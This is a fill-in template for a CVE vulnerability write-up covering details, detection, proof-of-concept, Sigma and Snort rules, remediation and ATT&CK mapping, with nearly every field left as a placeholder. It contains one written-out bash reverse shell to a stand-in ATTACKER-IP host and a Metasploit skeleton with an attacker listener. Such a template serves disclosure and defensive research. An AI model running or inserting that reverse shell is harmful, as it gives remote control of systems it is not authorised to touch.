Overview
[Brief description of the vulnerability - what it does, why it matters]
Vulnerability Details
| Attribute | Details |
|---|---|
| CVE ID | CVE-YYYY-XXXXX |
| CWE | CWE-XXX - [CWE_NAME] |
| CVSS v3.1 | 0.0 CVSS:3.1/… |
| Severity | [SEVERITY] |
| Attack Vector | [Network/Adjacent/Local/Physical] |
| Attack Complexity | [Low/High] |
| Privileges Required | [None/Low/High] |
| User Interaction | [None/Required] |
| Scope | [Unchanged/Changed] |
| Published | YYYY-MM-DD |
| Last Modified | YYYY-MM-DD |
CVSS Breakdown
- Base Score: 0.0
- Impact Score: 0.0
- Exploitability Score: 0.0
Impact:
- Confidentiality: [None/Low/High]
- Integrity: [None/Low/High]
- Availability: [None/Low/High]
Affected Systems
Vulnerable Versions
| Vendor | Product | Affected Versions | Fixed Version |
|---|---|---|---|
| [VENDOR] | [PRODUCT] | [X.X - X.X] | [X.X] or TBA |
Platform-Specific Details
Operating Systems:
- Windows
- Linux
- macOS
- All platforms
Common Affected Applications:
- Application 1
- Application 2
- Application 3
Prerequisites:
- Prerequisite 1
- Prerequisite 2
- Prerequisite 3
Technical Analysis
Root Cause
[Explain what causes the vulnerability at a technical level]
Attack Scenario
Exploitation
Detection
Check if system is vulnerable:
# Linux detection commands
[DETECTION_COMMAND]
# Windows detection commands
[DETECTION_COMMAND]Version checking:
# Check version
[VERSION_CHECK_COMMAND]Proof of Concept (PoC)
Ethical Use Only This PoC is for authorized testing only. Unauthorized access is illegal.
Method 1: [EXPLOITATION_METHOD_NAME]
Step 1: [DESCRIPTION]
# Commands
[EXPLOIT_COMMANDS]Step 2: [DESCRIPTION]
# Commands
[EXPLOIT_COMMANDS]Step 3: Verify success
# Verification
[VERIFICATION_COMMANDS]Method 2: Using Metasploit (if applicable)
msfconsole
use exploit/[MODULE_PATH]
set RHOSTS [TARGET_IP]
set LHOST [ATTACKER_IP]
set LPORT 4444
exploitExploitation Code
#!/usr/bin/env python3
"""
CVE-YYYY-XXXXX Exploit
Author: [YOUR_NAME]
Description: [BRIEF_DESCRIPTION]
"""
import requests
import sys
def exploit(target, command):
"""
Exploit CVE-YYYY-XXXXX
"""
payload = {
# Craft your payload
}
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0"
}
try:
response = requests.post(
f"{target}/vulnerable-endpoint",
json=payload,
headers=headers,
timeout=10
)
print(f"[+] Status: {response.status_code}")
print(f"[+] Response: {response.text}")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 exploit.py <target_url>")
sys.exit(1)
exploit(sys.argv[1], "id")Payload Examples
Basic payload:
[BASIC_PAYLOAD]Reverse shell (Linux):
bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1'Reverse shell (Windows):
[WINDOWS_REVERSE_SHELL]Detection & Monitoring
Indicators of Compromise (IoCs)
Network Indicators:
IP Addresses:
- [MALICIOUS_IP_1]
- [MALICIOUS_IP_2]
Domains:
- [MALICIOUS_DOMAIN]
User-Agents:
- [MALICIOUS_USER_AGENT]
File Indicators:
File Hashes (SHA256):
- [HASH_1]
File Paths:
- [SUSPICIOUS_FILE_PATH]
Process Indicators:
- [SUSPICIOUS_PROCESS_1]
- [SUSPICIOUS_PROCESS_2]
Detection Rules
Sigma Rule
title: CVE-YYYY-XXXXX Exploitation Attempt
id: [GENERATE_UUID]
status: experimental
description: Detects exploitation attempts for CVE-YYYY-XXXXX
references:
- https://nvd.nist.gov/vuln/detail/CVE-YYYY-XXXXX
author: [YOUR_NAME]
date: YYYY-MM-DD
logsource:
category: [LOG_CATEGORY]
product: [PRODUCT]
detection:
selection:
field1: 'value1'
field2: 'value2'
condition: selection
falsepositives:
- [FALSE_POSITIVE_1]
level: [critical/high/medium]
tags:
- attack.[TACTIC]
- attack.[TECHNIQUE]
- cve.YYYY.XXXXXSnort Rule
alert tcp any any -> any [PORT] (msg:"CVE-YYYY-XXXXX Exploitation Attempt";
content:"[PATTERN]";
flow:to_server,established;
classtype:attempted-admin;
sid:[SID];
rev:1;)
Log Analysis
What to look for:
- [LOG_INDICATOR_1]
- [LOG_INDICATOR_2]
- [LOG_INDICATOR_3]
Example log entry:
[YYYY-MM-DD HH:MM:SS] [LOG_ENTRY_EXAMPLE]
Remediation
Immediate Actions
-
[ ] Identify affected systems
# Commands to identify [IDENTIFICATION_COMMANDS] -
[ ] Isolate affected systems
# Isolation commands [ISOLATION_COMMANDS] -
[ ] Review logs for exploitation
# Log review commands [LOG_REVIEW_COMMANDS]
Patching
Vendor Patches
| Vendor | Advisory | Patch Link | Status |
|---|---|---|---|
| [VENDOR] | [ADVISORY_ID] | [LINK] | [STATUS] |
Manual Patching
# Linux
[LINUX_PATCH_COMMANDS]
# Windows
[WINDOWS_PATCH_COMMANDS]Verification
# Verify patch is applied
[VERIFICATION_COMMANDS]Workarounds
Option 1: [WORKAROUND_NAME]
# Workaround commands
[WORKAROUND_COMMANDS]Option 2: [ALTERNATE_WORKAROUND]
# Alternate workaround
[ALTERNATE_COMMANDS]Long-term Mitigations
- Mitigation 1
- Mitigation 2
- Mitigation 3
- Mitigation 4
- Mitigation 5
Related Writeups
Tools & Resources
Exploitation Tools
Scanning Tools
# Nmap
nmap --script [SCRIPT_NAME] -p [PORT] [TARGET]
# Nuclei
nuclei -t cves/[YEAR]/CVE-YYYY-XXXXX.yaml -u [TARGET]MITRE ATT&CK Mapping
Tactics:
Techniques:
Sub-techniques:
- T0000.001 - [SUB_TECHNIQUE_NAME]